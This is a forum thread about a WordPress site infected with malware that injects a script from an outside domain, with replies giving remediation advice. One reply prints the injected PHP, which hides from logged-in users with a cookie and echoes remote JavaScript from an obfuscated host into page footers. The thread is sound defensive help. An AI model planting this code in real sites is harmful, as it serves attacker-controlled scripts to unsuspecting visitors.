One of my company's client's website is infected with a malware. In the source there is a <script src="http://www.10wp.org/jquery.js"></script> that is printed randomly.
I following this article and searching the code. But so far I could find where the malicious script is inserted.
Did any of you have the same issue? Where did you find the malicious script?
You need to nuke the system from orbit. There is no way for us to know where that code is being injected into your server output, and there is no way for you to ever know that the system isn't still compromised.
You need to stand up a new server, patch it so that it is not reinfected, and load your application code from backup. That is the only way you can be sure you've resolved the problem.
the mallware inserts a piece of code in a random place of your site. After many hours of testing and searching i found this one.
if(!function_exists('wp_func_jquery')) {
if (!current_user_can( 'read' ) && !isset(${_COOKIE}['wp_min'])) {
function wp_func_jquery() {
$host = 'http://';
$jquery = $host.'lib'.'wp.org/jquery-ui.js';
$headers = @get_headers($jquery, 1);
if ($headers[0] == 'HTTP/1.1 200 OK'){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}
}
add_action('wp_footer', 'wp_func_jquery');
}
function wp_func_min(){
setcookie('wp_min', '1', time() + (86400 * 360), '/');
}
add_action('wp_login', 'wp_func_min');
}
look for wp_func_jquery or lib'.'wp.org
the inserted jquery should be empty when you open it in browser, it deploys its payload under other circumstances.
Hope it helps
